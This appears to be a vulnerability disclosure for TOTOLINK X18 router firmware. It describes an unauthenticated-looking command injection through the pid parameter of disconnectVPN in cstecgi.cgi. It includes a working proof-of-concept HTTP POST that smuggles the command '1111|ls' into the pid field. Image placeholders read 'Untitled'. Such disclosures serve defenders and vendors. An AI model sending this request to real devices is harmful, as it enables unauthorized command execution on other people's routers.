Firmware

TOTOLINKļ¼šX18 V9.1.0cu.2024_B20220329

https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/226/ids/36.html

Untitled

Details

The pid parameter of disconnectVPN in cstecgi.cgi is controllable, and the input pid is directly spliced with string without any verification, resulting in command execution after calling CsteSystem, and ida does not correctly analyze the parameters of CsteSystem.

Untitled

CsteSystem comes from the/usr/lib/libcscommon.so. Through analysis, you can know that the command will eventually be executed by calling/bin/bash through execv

Untitled

Poc:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.109.161
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 44
Origin: <http://192.168.109.161>
Connection: close
Referer: <http://192.168.109.161/advance/remote.html?timestamp=1667552118248>
Cookie: SESSION_ID=2:1667546811:2

{"pid":"1111|ls","topicurl":"disconnectVPN"}

Test screenshot:

Untitled